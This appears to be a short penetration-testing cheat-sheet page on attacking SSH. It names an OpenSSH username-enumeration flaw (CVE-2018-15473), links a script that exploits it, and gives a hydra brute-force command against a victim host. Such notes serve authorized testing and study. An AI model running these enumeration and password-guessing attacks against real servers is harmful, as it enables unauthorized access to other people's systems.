SSH

OpenSSH 2.3 < 7.7 - Username Enumeration - CVE-2018-15473

You can either use: nmap, msf module or any git scripts to accomplish this. I personally use msf.

There is this python script available: https://raw.githubusercontent.com/epi052/cve-2018-15473/master/ssh-username-enum.py

Brute Force

hydra -l admin -P wordlist.txt victim_ip -t 4 ssh

Last updated